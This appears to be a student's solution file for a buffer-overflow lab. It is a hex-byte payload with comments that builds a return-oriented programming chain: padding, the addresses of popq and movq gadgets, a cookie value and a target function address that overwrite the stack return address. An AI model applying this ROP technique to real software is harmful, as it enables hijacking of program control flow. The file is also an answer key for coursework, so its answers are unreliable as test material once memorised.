00 00 00 00 00 00 00 00     /* padding 40 bytes */
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 

/*  Take advantage of 58 c3 in the following code 
    The starting address of the code to be used is: 0x4019ab

    4019a7: 8d 87 51 73 58 90     lea -0x6fa78caf(%rdi), %eax
    4019ad: c3                    retq 
*/
ab 19 40 00 00 00 00 00     /* The data in the return address area is replaced with the target code address */
            
/*  The object code will pop the data from the stack into the rax register, 
    so we need to fill the next memory with the value of the cookie.
    my cookie is: 59b997fa
*/
fa 97 b9 59 00 00 00 00

/*  At the end of the first piece of object code, it returns, 
    returns the address specified by the value of the next eight bytes, 
    thus filling it with the starting address of the second piece of gadget code. 

    The next gadget is:
    4019a0: 8d 87 48 89 c7 c3     lea -0x3c3876b8(%rdi), %eax
    4019a6: c3                    retq

    we need use:
    48 89 c7 c3 ==> movq rax, rdi;  ret
    The starting address of the code is: 0x4019a2
*/
a2 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00
